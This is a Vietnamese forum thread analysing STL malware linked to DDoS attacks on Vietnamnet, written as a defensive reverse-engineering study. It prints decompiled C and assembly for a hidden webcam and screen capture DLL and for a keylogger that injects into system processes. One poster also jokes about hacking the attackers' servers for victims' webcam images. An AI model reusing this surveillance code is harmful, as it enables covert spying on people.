Cái này theo suy nghĩ nông cạn của em là để xem mọi người hay dùng phần mềm gì, những tool nào là cần thiết mà nhiều người sử dụng --> để tiện anti / update malware và đính kèm vài chú malware vào những tool phổ biến này. Và để làm được điều đó thì nhất thiết coder của stl phải lấy nhũng thông tin này. Chỉ vấn đề anti debug và detect các tool khác thôi em thấy mấy anh stl này code rất cực khổ với anh N rồi mà giờ còn làm thêm cái trò này, mấy anh stl hình như không biết mệt. Còn việc lấy thông tin về phần cứng như HDD serial, card, Modem mạng thì em cũng không biết mấy ảnh làm gì nữa ?.Hổng lẽ mấy ảnh định chuyển hướng sang kinh doanh linh kiện máy tính và đang tìm hiểu thị trường =))

Phân tích tính chất vài trận DDoS HVA vừa qua.

xnohat — GMT

TQN wrote:

Các bạn thử đoán xem, stl coder lấy list các software, các update trên máy victim để làm gì ? Thâm hiểm lắm đấy !

Thì thống kê xem cái software nào hiện đang được dùng nhiều, hay máy mục tiêu đang chạy software gì để mà còn "núp bóng" chứ :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

Vanxuanemp — GMT

TQN wrote:

Và các bạn còn nhớ cái name pipe tên Nanned không trong bộ Dao360.dll.mui ? PS: Đoạn code HideDll của stl coder có bug, nên nó không hide được cversions.2.db hay dao360.dll.mui trong list DLLs panel view của Process Explorer hay Process Hacker... Em đố bạn nào tìm ra được bug đó, nếu tìm ra, CN này đi nhậu ;) Bữa nhậu này đáng lý phải bắt stl coder trả tiền, cho chừa cái tội copy code mà không hiểu, không test -:-) Các bạn thử đoán xem, stl coder lấy list các software, các update trên máy victim để làm gì ? Thâm hiểm lắm đấy !

Các đoạn code trên có nhiều mục đích lắm. Thứ nhất là tặng malware vào phần mềm crk hay sử dụng. Thứ 2 là giờ đây hack không chỉ là phần mềm, mà còn là phần cứng, các lỗ hổng trong phần cứng mới là nhiều và thường ít được biết tới và ít quan tâm hơn là phần mềm, cũng như khó để xử lý hơn. Sau khi biết victim sử dụng loại phần mềm và phần cứng nào thì càng tăng ưu thế cũng như khả năng dễ tấn công theo nhiều hướng khác nhau. PS: Hôm nay vietnamnet vào rất nhanh, có lẽ DDOS đã tạm dừng, cộng với việc tăng số server để chống đỡ DDOS nên giờ vietnamnet vào nhanh như chớp.

Phân tích tính chất vài trận DDoS HVA vừa qua.

vncyberwar — GMT

Chúc mừng Vietnamnet đã giải quyết được vấn đề của mình... giờ thì chắc ổn rồi ... :)

Phân tích tính chất vài trận DDoS HVA vừa qua.

learningandlearning — GMT

Anh em giải lao thôi. Lúc này nếu VietNamNet chống được thì STL sẽ làm gì nhỉ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Từ Úc, Mỹ và Đức vẫn không thể vào vietnamnet bằng bất cứ trình duyệt nào.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Bà con nào nếu tìm trong thấy trong harddisk của mình có các file của QTTask.zip, file AcScreen.dll, hay các file trong bộ Dao360.dll.mui thì chịu khó xoá giùm đi. Boot vào SafeMode hay dùng HirenBoot CD để boot vào DOS, xoá ngay lập tức. Em cảnh báo bao nhiêu lần rồi, bà con không chịu xoá thì mai mốt bị "tắm trắng" ráng chịu à nhen ;) Còn nếu bà con vẫn không sợ, không chịu xoá, vui lòng lấy băng keo đen dán vào Webcam của mình, hay rút nó ra luôn. Khi nào cần chat với em út thì cắm lại. Từ 2010, coder stl đã chơi trò chụp hình người ngồi trước máy tính thông qua webcam, save thành một file DIB (BMP), convert sang JPEG file bằng cách dùng các methods trong class Image của GdiPlus, rồi úp về mấy cái host kia. Quá đáng thật X((may là em không bao giờ gắn webcam vào máy) Lúc trước em đã RCE sơ bộ file AcScreen.dll này rồi, nhưng lại không để ý. Giờ móc mấy file "mèo què" chưa RCE xong ra làm tiếp, mới giật mình phát hiện. Đoạn code video capture bằng Video For Windows API em quen lắm, vì lúc còn làm coder có làm một số project = VFW, sau đó mới chuyển qua dùng DirectShow. File AcScreen.dll được gọi bằng cversions.2.db và dao360.dll.mui. Nó export ra 3 hàm để hai ông nội kia gọi. Ba hàm đó, thằng thì tìm video capture driver index, thằng thì chụp màn hình, thằng thì bật webcam lên capture "dung nhan" của victim. Kiểu này thì em phải ráng hack vào các server kia mới được, hình ảnh "tươi mát" của các cô victim lúc ngồi máy ăn bận mát mẽ đầy ra đó. Mấy anh stl sướng thiệt, rữa mắt miễn phí, bát ngát luôn. Share cho em vài tấm hình "hot hot" nhen ;).

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

File AcScreen.dll có tên gốc lúc build là CaptureScreen.dll

Export 3 hàm sau:

Hàm select video capture driver sẽ select video driver đầu tiên hợp lệ, vd: Webcam, camera an ninh.... Code:

int __stdcall GetCaptureDriver()
{
    UINT wDriverIndex; // [sp+4h] [bp-414h]@1
    WCHAR wzVer[252]; // [sp+8h] [bp-410h]@1
    WCHAR wzName[254]; // [sp+200h] [bp-218h]@1

    memset(&szName[1], 0, 0x1F2u);
    memset(&szVer[1], 0, 0x1F2u);

    for (wDriverIndex = 0; wDriverIndex < 9; ++wDriverIndex)
    {
        if (capGetDriverDescriptionW(wDriverIndex, szName, 500, szVer, 500))
        {
            return wDriverIndex;
        }
    }

    return -1;
}

Hàm export D3DRMColorGetRed sẽ trả về cho caller TRUE hay FALSE. FALSE khi máy victim không có video capture driver. Code:

BOOL __stdcall D3DRMColorGetRed()
{
    return GetCaptureDriver() != -1;
}

Hàm D3DRMColorGetGreen sẽ được caller gọi để bắt đầu video capture, tham số đưa vào là filename của file image capture Code:

BOOL __stdcall D3DRMColorGetGreen(LPWSTR pwzImgCaptured)
{
    HANDLE hCaptureThread;

    g_hDesktop = CreateDesktopW(L"Defau1t1", 0, 0, 1u, 0x10000000u, 0);
    if (L"Defau1t1")  //  => bug của stl coder, may mà luôn luôn đúng
    {
        hCaptureThread = CreateThread(0, 0, CaptureThreadProc, 0, 0, 0);
        WaitForSingleObject(hCaptureThread, INFINITE);
        CloseDesktop(g_hDesktop);
        wcscpy(pwzImgCaptured, g_wzCaptureFileName);
    }
    
    return 0; // => stl coder bug: không CloseHandle(hCaptureThread);
}

CaptureThreadProc sẽ create tiếp 2 thread, một thread để force kill capture video window, 1 thread thực hiện capture Code:

int __cdecl VideCaptureThreadProc()
{
    int result;
    int captureDriverIndex;

    SetThreadDesktop(g_hDesktop);
    captureDriverIndex = GetCaptureDriver();
    if (captureDriverIndex == -1)
    {
        result = -1;
    }
    else
    {
        VideoCapture(g_wzCaptureFileName, captureDriverIndex, 640, 480, 10);
        result = 0;
    }
    return result;
}

640, 480 là kích thước capture video window, 10 là số loop count của message loop của capture video window. Code:

signed int __cdecl VideoCapture(WCHAR *pwzDibFile, UINT capDriverIdx, int nWidth, int nHeight, int loopCount)
{
    DWORD dwWndLong; 
    MSG Msg;
    HWND hwndCapture;

    HWND hDskWnd = GetDesktopWindow();

    hwndCapture = j_capCreateCaptureWindowW(0, 0x40000000u, 0, 0, nWidth, nHeight, hDskWnd, 0);
    if (hwndCapture)
    {
        dwWndLong = GetWindowLongW(hwndCapture, GWL_EXSTYLE);
        SetWindowLongW(hwndCapture, GWL_EXSTYLE, (dwWndLong | 0x80080) & 0xFFFBFFFF);

        ShowWindow(hwndCapture, SW_SHOWNORMAL);

        SetLayeredWindowAttributes(hwndCapture, 0, 1, LWA_ALPHA); // capture window sẽ transparent, không thấy trên màn hình

        if (IsWindow(hwndCapture))
            SendMessageW(hwndCapture, WM_CAP_DRIVER_CONNECT, capDriverIdx, 0);

        if (IsWindow(hwndCapture))
            SendMessageW(hwndCapture, WM_CAP_SET_SCALE, TRUE, 0); // scale preview image to 640x480

        if (IsWindow(hwndCapture))
            SendMessageW(hwndCapture, WM_CAP_SET_PREVIEWRATE, 60, 0); // 1s chụp 1 frame

        if (IsWindow(hwndCapture))
            SendMessageW(hwndCapture, WM_CAP_SET_PREVIEW, TRUE, 0); // start preview mode

        for (i = 0; i < loopCount; ++i)
        {
            GetMessageW(&Msg, hwndCapture, 0, 0);
            DispatchMessageW(&Msg);
            TranslateMessage(&Msg);
        }

        if (IsWindow(hwndCapture))
            SendMessageW(hwndCapture, WM_CAP_FILE_SAVEDIBW, 0, pwzDibFile); // save to bmp file

        if (IsWindow(hwndCapture))
            SendMessageW(hwndCapture, WM_CAP_DRIVER_DISCONNECT, capDriverIdx, 0);

        DestroyWindow(hwndCapture);
        result = 1;
    }
    else
    {
        result = 0;
    }

    return result;
}

Hàm export cuối cùng chỉ làm nhiệm vụ capture screen và lưu vào file input parameter Code:

UINT __stdcall D3DRMColorGetBlue(LPWSTR pwzImgFile)
{
    WCHAR wzTempFileName[520];
    HGDIOBJ hBmp;
    int flag, xStart, yStart, nWidth, nHeight;

    memset(wzTempFileName, 0, 1040);
    CreateWmpTempFileName(wzTempFileName);
    hBmp = ScreenCapture(flag, xStart, yStart, nWidth, nHeight);
    if (hBmp)
    {
        SaveToJPGFile(hBmp, wzTempFileName, 75);
        wcscpy(pwzImgFile, wzTempFileName);
    }
    return 0;
}

Trong file này, stl coder code bug tá lã, quên CloseHandle cho các hThread nhiều lắm. Máy ai mà chạy lâu lâu thì chỉ có nước die, cạn hết kernel handles. Cách dùng KillThreadProc để kill Video capture window rất ngớ ngẫn, vì vậy các bạn mới thấy stl coder gọi IsWindow liên tục như vậy, chắp vá phải không bạn stl ? Và một điều nữa là các bạn có thấy không, stl coder ít dùng các class std::string, CString,... cứ khoái declare các buffer bự tổ chãng rồi memset tá lã hết ! Chỉ vài đoạn code C vậy thôi là dung nhan "mát mẽ" của các em gái victim bị chụp hết. Đơn giản ha ! Kiểu này em cũng viết một con mới được, tìm một cái FTP server nữa là có hình "nóng" xem mệt xỉu. Và bà con IT nam thì rút kn, khi ngồi máy thì đừng ở trần, ngồi đàng hoàng nhen =))

Phân tích tính chất vài trận DDoS HVA vừa qua.

whitesnow19 — GMT

Mấy bữa trước hãy vào VNN bằng link: http://tmp.vietnamnet.vn => click vào banner là vào được. Nay vào thì thấy báo là: Access is denied ! Web admin junzennt@gmail.com

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Tới giờ, có lẽ chuyện về stl cũng đã hết rồi, không còn nóng hổi nữa. Thay vào đó, chúng ta sẽ cùng nhau RCE, phân tích các tip&tricks, các đoạn code đáng chú ý của stl coder để ai có thích tìm hiểu về RCE, coding, virus có thể học hỏi được điều gì đó. Đồng thời cũng để trao đổi kỹ thuật, các tools, script để RCE. Tôi xin quay lại với dll keylog của stl hồi xưa, hardkbd.dll. Bà con còn nhớ không ? Size = 136192 bytes. Hardkbd.dll còn có tên khác là IEFrame.ocx, cũng size đó luôn. File này export ra 4 hàm, fake các hàm của COM dll:

Name VA Index ------- --- ------- DllCanUnloadNow 10002680 1 DllGetClassObject 10002680 2 DllRegisterServer 10002160 3 DllUnregisterServer 10002680 4

Trong 4 hàm trên, chỉ có hàm DllRegisterServer là có code, còn toàn bộ là empty function, chỉ return FALSE. Khi hardkbd.dll được mèo què khác của stl load lên, ngay trong hàm DllMain, code chỉ call 1 hàm duy nhất, tôi gọi là MainProc. Hàm MainProc sẽ làm rất nhiều việc, lấy version của Windows, tuỳ theo version của Win mà sẽ create các thread tương ứng. Các thread này kiểm tra Exe parent mà nó được load. Tương ứng với services.exe, winlogon.exe, logonui.exe, explorer.exe sẽ có các thread khác nhau. Sau đó MainProc sẽ remote load ieframe.ocx (cũng chính là hardkbd.dll) vào Explorer.exe. Code:

int __cdecl MainProc()
{
    int osVer;
    HANDLE hProcess;
    BOOL notWinLogonExe;
    DWORD ThreadId;
    WCHAR wzPath[260];

    osVer = GetVersion();
    memset(wzPath, 0, 520);

    hProcess = GetCurrentProcess();
    GetModuleFileNameExW(hProcess, 0, wzPath, 260);
    PathStripPathW(wzPath);

    if (!_wcsicmp(wzPath, L"services.exe"))
    {
        ThreadId = 0;
        CreateThread(0, 0, ThreadProcInServicesExe, 0, 0, &ThreadId);
    }

    notWinLogonExe = _wcsicmp(wzPath, L"winlogon.exe");
    if (osVer == 6)
    {
        if (notWinLogonExe)
            goto @@IsExplorer;
        ThreadId = 0;
        CreateThread(0, 0, ThreadProcInWinLogon, 0, 0, &ThreadId);
        CreateThread(0, 0, InjectExplorerThreadProc, 0, 0, &ThreadID);
    }

    if (!notWinLogonExe)
    {
        ThreadId = 0;
        InitMSDataVXDFile_And_LoadIEFrameOCX_And_HookKeyboard();
        CreateThread(0, 0, InjectExplorerThreadProc, 0, 0, &ThreadId);
    }

    if (!_wcsicmp(wzPath, L"logonui.exe"))
    {
        CreateThread(0, 0, ThreadProcInLogOnUIExe, 0, 0, &ThreadID);
    }

@@IsExplorer:
    if (!_wcsicmp(wzPath, L"explorer.exe"))
    {
        ThreadId = 0;
        CreateThread(0, 0, ThreadProcInExplorer, 0, 0, &ThreadId);
    }

    return -1;

Hàm InitMSDataVXDFile_And_LoadIEFrameOCX_And_HookKeyboard() sẽ create file msdata.vxd trong thư mục System32 Code:

int InitMSDataVXDFile_And_LoadIEFrameOCX_And_HookKeyboard()
{
    DWORD ThreadId;
    CHAR szMsdataVxdPath[260];

    if (S_OK != SHGetFolderPathA(0, CSIDL_SYSTEM), 0, 0, szMsdataVxdPath)
        return -1;

    sprintf_s(szMsdataVxdPath, 260, "%s\\msdata.vxd", szMsdataVxdPath);
    g_hFile_Msdatavxd = CreateMSDataVxdFile(szMsdataVxdPath),
    if (-1 == g_hFile_Msdatavxd)
        return -1;

    SetWindowsHookExA(WH_KEYBOARD, KbdHookProc, 0, GetCurrentThreadId(););
    write_string_after_xor_with_0x6F_to_msdata_vxd_file(0x12, g_hFile_Msdatavxd, "\r\n[Logon Window]\r\n");

    ThreadId = 0;
    CreateThread(0, 0, RemoteLoadIEFrameOCX, 0, 0, &ThreadId);

    return 0;
}

Hàm KbdHookProc chính là hàm DllRegisterServer: Code:

HRESULT __stdcall KbdHookProc(int code, WPARAM wparam, LPARAM lparam)
{
    DWORD len;
    HWND hwnd;
    int p;
    char ach;
    WORD nSc1, nSc2;
    HANDLE hFile;
    char *psz;
    SYSTEMTIME SystemTime;
    char szText[1500];
    char szWndText[1024];

    if ((code != 0)|| !(~(lparam >> 31) & 1) || wparam == VK_CAPITAL || wparam == VK_SHIFT || wparam == VK_LSHIFT)
        return CallNextHookEx(0, code, wparam, lparam);

    hFile = g_hmsdatavxdfile;

    if (wparam == VK_RETURN)
    {
        psz = "\r\n";
        len = 2;
    }
    else if (wparam == VK_SPACE)
    {
        psz = L" ";
        len = 1;
    }
    else if (wparam == VK_LWIN || wparam == VK_RWIN)
    {
        psz = "[Windows]";
        len = 9;
    }
    else if (wparam == VK_TAB)
    {
        psz = L"\t";
        len = 1;
    }
    else
    {
        hwnd = GetForegroundWindow();
        if (hwnd != g_hForegroundWndLast)
        {
            memset(szWndText, 0, 1024);
            GetWindowTextA(hwnd, szWndText, 1024);

            memset(szText, 0, 1500);
            GetLocalTime(&SystemTime);
            sprintf_s(szText, 1500, "\r\n\r\n[%s] - [%.4i/%.2i/%.2i %.2i/%.2i/%.2i]:\r\n",
                szWndText, SystemTime.wYear, SystemTime.wMonth, SystemTime.wDay,
                SystemTime.wHour, SystemTime.wMinute, SystemTime.wSecond);

            if (!write_string_after_xor_with_0x6F_to_msdata_vxd_file(strlen(szText), hFile, szText))
                return -1;

            g_hForegroundWndLast = hwnd;
        }

        GetKeyboardState(&g_abKeyState);
        nSc1 = MapVirtualKeyA(wparam, 0);
        if (ToAscii(wparam, v8, &g_abKeyState, &g_Char, 0) == 1)
        {
            if (g_Char > VK_SPACE)
            {
                wsprintfA(g_szKey, "%c", g_Char);
                len = strlen(g_szKey);
                psz = g_szKey;
            }
            nSc2 = MapVirtualKeyA(wparam, 0);
            if (GetKeyNameTextA(v9 << 16, g_szKey, 16) > 0)
            {
                len = strlen(g_szKey);
                psz = g_szKey;
            }
        }
        else
        {
            nSc1 = MapVirtualKeyA(wparam, 0);
            if (GetKeyNameTextA(nScancode << 16, g_szKey, 16) > 0)
            {
                len = strlen(g_szKey);
                psz = g_szKey;
                hFile = g_hmsdatavxdfile;
            }
        }
    }

    write_string_after_xor_with_0x6F_to_msdata_vxd_file(len, hFile, psz);
    return CallNextHookEx(0, code, wparam, lparam);
}

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Sợ chưa đủ, keylog không hết, stl coder còn phang thêm một cách keyboard log khác, dùng WM_INPUT và RawInput. Kỹ thuật này ít phổ biến nên có thể có bạn chưa biết. Tôi trình bày luôn: Trong các ThreadProcInxxx trên, stl tạo một window có size = 0, pos = 0, thuộc tính là HWND_MESSAGE. Tức window này sẽ luôn luôn nhận message cho dù nó có hidden, lost focus hay không. Code:

memset(&wcex, 0, 0x30u);
    wcex.cbSize = 48;
    wcex.lpfnWndProc = MSDataWndProc;
    wcex.hInstance = GetModuleHandleA(0);
    wcex.lpszClassName = "msdata";
    RegisterClassExA(&wcex);
    CreateWindowExA(0,  "msdata", "msdata", 0, 0, 0, 0, 0, HWND_MESSAGE, 0, hInstance, 0);
   ..........

Và code ASM của MSDataWndProc: Code:

.text:10001888     ON_WM_CREATE:                           ; DATA XREF: .text:WMHandlerTableo
.text:10001888 01C     mov     eax, [ebp+hWnd]
.text:1000188B 01C     push    0Ch                         ; cbSize
.text:1000188D 020     push    1                           ; uiNumDevices
.text:1000188F 024     lea     ecx, [ebp+rawInputDevices]
.text:10001892 024     push    ecx                         ; pRawInputDevices
.text:10001893 028     mov     dword ptr [ebp+rawInputDevices.usUsagePage], 60001h
.text:1000189A 028     mov     [ebp+rawInputDevices.dwFlags], RIDEV_INPUTSINK
.text:100018A1 028     mov     [ebp+rawInputDevices.hwndTarget], eax
.text:100018A4 028     call    ds:RegisterRawInputDevices
.text:100018A4
.text:100018AA 01C     test    eax, eax
.text:100018AC 01C     jnz     @@Return_0
.text:100018AC
.text:100018B2 01C     or      eax, 0FFFFFFFFh
.text:100018B5 01C     pop     edi
.text:100018B6 018     pop     esi
.text:100018B7 014     pop     ebx
.text:100018B8 010     mov     esp, ebp
.text:100018BA 004     pop     ebp
.text:100018BB 000     retn    10h
.text:100018BB
.text:100018BE     ; ---------------------------------------------------------------------------
.text:100018BE
.text:100018BE     ON_WM_INPUT:                            ; CODE XREF: MSDataWndProc+21j
.text:100018BE                                             ; DATA XREF: .text:WMHandlerTableo
.text:100018BE 01C     mov     edi, [ebp+cbSize]
.text:100018C1 01C     mov     ebx, ds:GetRawInputData
.text:100018C7 01C     push    16                          ; cbSizeHeader
.text:100018C9 020     lea     edx, [ebp+cbSize]
.text:100018CC 020     push    edx                         ; pcbSize
.text:100018CD 024     push    0                           ; pData
.text:100018CF 028     push    RID_INPUT                   ; uiCommand
.text:100018D4 02C     push    edi                         ; hRawInput
.text:100018D5 030     call    ebx ; GetRawInputData
.text:100018D5
.text:100018D7 01C     mov     eax, [ebp+cbSize]
.text:100018DA 01C     push    eax                         ; dwBytes
.text:100018DB 020     push    0                           ; dwFlags
.text:100018DD 024     call    ds:GetProcessHeap
.text:100018DD
.text:100018E3 024     push    eax                         ; hHeap
.text:100018E4 028     call    ds:HeapAlloc
.text:100018E4
.text:100018EA 01C     push    10h                         ; cbSizeHeader
.text:100018EC 020     lea     ecx, [ebp+cbSize]
.text:100018EF 020     push    ecx                         ; pcbSize
.text:100018F0 024     mov     esi, eax
.text:100018F2 024     push    esi                         ; pData
.text:100018F3 028     push    RID_INPUT                   ; uiCommand
.text:100018F8 02C     push    edi                         ; hRawInput
.text:100018F9 030     call    ebx ; GetRawInputData
.text:100018F9
.text:100018FB 01C     test    eax, eax
.text:100018FD 01C     jz      short @@FreeMem_And_Return_0
.text:100018FD
.text:100018FF 01C     cmp     [esi+RAWINPUTHEADER.dwType], RIM_TYPEKEYBOARD
.text:10001902 01C     jnz     short @@FreeMem_And_Return_0
.text:10001902
.text:10001904 01C     cmp     [esi+RAWINPUT.data.keyboard.Message], WM_KEYFIRST
.text:1000190B 01C     jnz     short @@FreeMem_And_Return_0
.text:1000190B
.text:1000190D 01C     movzx   ecx, [esi+RAWINPUT.data.keyboard.VKey] ; uCode
.text:10001911 01C     call    save_key_to_msdata_vxd_file
.text:10001911
.text:10001916 01C     cmp     eax, 0FFFFFFFFh
.text:10001919 01C     jnz     short @@FreeMem_And_Return_0
.text:10001919
.text:1000191B 01C     mov     edx, [ebp+hWnd]
.text:1000191E 01C     push    edx                         ; hWnd
.text:1000191F 020     call    ds:DestroyWindow
.text:1000191F
.text:10001925
.text:10001925     @@FreeMem_And_Return_0:                 ; CODE XREF: MSDataWndProc+9Dj
.text:10001925                                             ; MSDataWndProc+A2j
.text:10001925                                             ; MSDataWndProc+ABj
.text:10001925                                             ; MSDataWndProc+B9j
.text:10001925 01C     push    esi                         ; lpMem
.text:10001926 020     push    0                           ; dwFlags
.text:10001928 024     call    ds:GetProcessHeap
.text:10001928
.text:1000192E 024     push    eax                         ; hHeap
.text:1000192F 028     call    ds:HeapFree
.text:1000192F
.text:10001935 01C     xor     eax, eax
.text:10001937 01C     pop     edi
.text:10001938 018     pop     esi
.text:10001939 014     pop     ebx
.text:1000193A 010     mov     esp, ebp
.text:1000193C 004     pop     ebp
.text:1000193D 000     retn    10h
.text:1000193D
.text:10001940     ; ---------------------------------------------------------------------------
.text:10001940
.text:10001940     ON_WM_DESTROY:                          ; CODE XREF: MSDataWndProc+21j
.text:10001940                                             ; DATA XREF: .text:WMHandlerTableo
.text:10001940 01C     mov     eax, g_hFile_Msdatavxd
.text:10001945 01C     cmp     eax, 0FFFFFFFFh
.text:10001948 01C     jz      short @@Quit
.text:10001948
.text:1000194A 01C     push    eax                         ; hObject
.text:1000194B 020     call    ds:CloseHandle
.text:1000194B
.text:10001951
.text:10001951     @@Quit:                                 ; CODE XREF: MSDataWndProc+E8j
.text:10001951 01C     push    0                           ; nExitCode
.text:10001953 020     call    ds:PostQuitMessage
.text:10001953
.text:10001959
.text:10001959     @@Return_0:                             ; CODE XREF: MSDataWndProc+4Cj
.text:10001959 01C     xor     eax, eax
.text:1000195B 01C     pop     edi
.text:1000195C 018     pop     esi
.text:1000195D 014     pop     ebx
.text:1000195E 010     mov     esp, ebp
.text:10001960 004     pop     ebp
.text:10001961 000     retn    10h
.text:10001961
.text:10001964     ; ---------------------------------------------------------------------------
.text:10001964
.text:10001964     ON_WM_QUERYENDSESSION:                  ; CODE XREF: MSDataWndProc+21j
.text:10001964                                             ; DATA XREF: .text:WMHandlerTableo
.text:10001964 01C     call    SavePowerOffTime
.text:10001964
.text:10001969 01C     push    0                           ; uExitCode
.text:1000196B 020     call    ds:ExitProcess
.text:1000196B
.text:10001971     ; ---------------------------------------------------------------------------
.text:10001971
.text:10001971     DefaultHandler:                         ; CODE XREF: MSDataWndProc+14j
.text:10001971                                             ; MSDataWndProc+21j
.text:10001971                                             ; DATA XREF: .text:WMHandlerTableo
.text:10001971 01C     mov     eax, [ebp+cbSize]
.text:10001974 01C     mov     edx, [ebp+wParam]
.text:10001977 01C     push    eax                         ; lParam
.text:10001978 020     mov     eax, [ebp+hWnd]
.text:1000197B 020     push    edx                         ; wParam
.text:1000197C 024     push    ecx                         ; Msg
.text:1000197D 028     push    eax                         ; hWnd
.text:1000197E 02C     call    ds:DefWindowProcA
.text:1000197E
.text:10001984 01C     pop     edi
.text:10001985 018     pop     esi
.text:10001986 014     pop     ebx
.text:10001987 010     mov     esp, ebp
.text:10001989 004     pop     ebp
.text:1000198A 000     retn    10h
.text:1000198A
.text:1000198A     MSDataWndProc endp

Hàm save_key_to_msdata_vxd_file cũng gần tương tự như code của hàm KbdHookProc. Mong được các bạn đóng góp kết quả RCE của các bạn, các thắc mắc, trao đổi...

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

he he, malware của STL giống như nồi lẩu thập cẩm vậy đó. Chỉ có điều thành phần tạo nên nồi lẩu này ăn vô không bị điên thì cũng khùng, không bị khùng cũng bị ngộ độc... màng não :-) . Thật vinh dự cho nền CNTT nước nhà. Nếu xuất khẩu loại "lẩu thập cẩm" này chắc cũng thu bộn ngoại tệ á =)) nhưng đây là chuyện nhỏ... chuyện quan trọng hơn là chẳng mấy hồi ta sánh vai với các cường quốc điện toán. Hôm bữa tớ ngồi làm 1 bài toán hỗn hợp, phân tích các thông tin của stl thì lộ ra một địa danh có số lần xuất hiện nhiều nhất, đố các bạn đó là địa danh gì? :P

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Cái này thì em đồng ý với anh conmale. Em cũng là dân code, nhưng khi tái tạo lại source code của stl, thì em cứ quái, khùng không vầy trời ??? stl coder dùng rất nhiều kỹ thuật cao, ít phổ biến trong lập trình hệ thống trên Win32, nhưng khi mang các kỹ thuật đấy vào code thì lại code rất ngớ ngẩn, bug tá lã. Coding style tùm lum, không thống nhất, giống như anh em coder nhà ta code outsource, miển chạy, lấy tiền là được rồi. Vd nhé, trên cái hàm MSDataWndProc em vừa post, trước giờ stl coder hay và đang xài malloc, new, tự dưng lại phang vô HeapAlloc(GetProcessHeap(), size). Rồi khi CloseHandle, HeapFree thì lại không thèm check parameter truyền vào. May mà các API của Windows đã check, không thì crash cả đống "mèo què" hết. Để em đoán nhé, cái địa danh xuất hiện nhiều nhất có phải là Sandrex không anh conmale ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

TQN wrote:

Cái này thì em đồng ý với anh conmale. Em cũng là dân code, nhưng khi tái tạo lại source code của stl, thì em cứ quái, khùng không vầy trời ??? stl coder dùng rất nhiều kỹ thuật cao, ít phổ biến trong lập trình hệ thống trên Win32, nhưng khi mang các kỹ thuật đấy vào code thì lại code rất ngớ ngẩn, bug tá lã. Coding style tùm lum, không thống nhất, giống như anh em coder nhà ta code outsource, miển chạy, lấy tiền là được rồi. Vd nhé, trên cái hàm MSDataWndProc em vừa post, trước giờ stl coder hay và đang xài malloc, new, tự dưng lại phang vô HeapAlloc(GetProcessHeap(), size). Rồi khi CloseHandle, HeapFree thì lại không thèm check parameter truyền vào. May mà các API của Windows đã check, không thì crash cả đống "mèo què" hết. Để em đoán nhé, cái địa danh xuất hiện nhiều nhất có phải là Sandrex không anh conmale ?

hì hì, anh quên hỏi cụ thể hơn: địa danh nào ở Việt Nam :).

Phân tích tính chất vài trận DDoS HVA vừa qua.

freedomsg — GMT

Hix hix, nghe các bác nói bọn stl chế malware để lấy cắp "thông tin cá nhân" của nạn nhân trên internet mình cũng cảm thấy bất an cho pc của mình (mình thuộc phe tự do) và đồng thời cũng khinh bỉ tụi nó cực độ X( Ko chừng pc mình đã được bọn nó ghé thăm mà mình ko biết. Hôm qua, mình đã down Tcpview và SmartSnif (còn cái Wai-shet gì đó phức tạp quá!!) để kiểm tra các liên kết nhưng trong list có cả trăm connection thì ai mà biết liên kết nào là của bọn nó. Các bạn cao tăng trên đây có thể làm một bài hướng dẫn cụ thể cách phòng-chống-diệt mèo que cho mọi người được ko ? Theo mình nghĩ, phòng thủ ở đây là sử dụng một chương trình AntiVirut được cập nhật thường xuyên (mình sử dụng Avira Free) nhưng nếu bọn chúng tung ra con mèo que mới trong khi các AntiVirut chưa được cập nhật thì nguy cơ bị dính vẫn còn. Không biết còn kiểu phòng thủ nào nữa ko ?? Thks.

Phân tích tính chất vài trận DDoS HVA vừa qua.

quygia128 — GMT

Cách phòng chống thì bạn đọc lại từ đầu tới giờ là có thể hiểu phòng chống bằng cách nào rồi. Trong bài thảo luận này đã nói đến rất nhiều tại bạn chưa đọc hết hay sao ấy ?

để kiểm tra các liên kết nhưng trong list có cả trăm connection thì ai mà biết liên kết nào là của bọn nó.

Bạn hãy tắt hết các chương trình cần truy cập mạng của mình : Trình duyệt web, yahoo.... rồi bạn chạy chương trình SmartSniff, dow bản đã fix của anh TQN ở trang trước để tiến hành Sniff thôi. Khi có kết nối ra ngoài nó sẽ ghi nhận lại địa chỉ IP, bác có thể vào mấy trang kiểm tra IP để xem nó kết nối đi đâu :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

namkaka — GMT

conmale wrote:

TQN wrote:

Cái này thì em đồng ý với anh conmale. Em cũng là dân code, nhưng khi tái tạo lại source code của stl, thì em cứ quái, khùng không vầy trời ??? stl coder dùng rất nhiều kỹ thuật cao, ít phổ biến trong lập trình hệ thống trên Win32, nhưng khi mang các kỹ thuật đấy vào code thì lại code rất ngớ ngẩn, bug tá lã. Coding style tùm lum, không thống nhất, giống như anh em coder nhà ta code outsource, miển chạy, lấy tiền là được rồi. Vd nhé, trên cái hàm MSDataWndProc em vừa post, trước giờ stl coder hay và đang xài malloc, new, tự dưng lại phang vô HeapAlloc(GetProcessHeap(), size). Rồi khi CloseHandle, HeapFree thì lại không thèm check parameter truyền vào. May mà các API của Windows đã check, không thì crash cả đống "mèo què" hết. Để em đoán nhé, cái địa danh xuất hiện nhiều nhất có phải là Sandrex không anh conmale ?
hì hì, anh quên hỏi cụ thể hơn: địa danh nào ở Việt Nam :).

em đoán đó là nha trang quê cũ của anh đúng không ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Hì hì, em thì chỉ nghĩ là stl phải nhắc nhiều nhất là Hà Nội hay Hải Phòng thôi ! Phải không anh conmale. Cho đáp án đi anh ;) Đừng có nói là tụi nó nhắc tới Gialai quê em nhé =))

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

TQN wrote:

Hì hì, em thì chỉ nghĩ là stl phải nhắc nhiều nhất là Hà Nội hay Hải Phòng thôi ! Phải không anh conmale. Cho đáp án đi anh ;) Đừng có nói là tụi nó nhắc tới Gialai quê em nhé =)

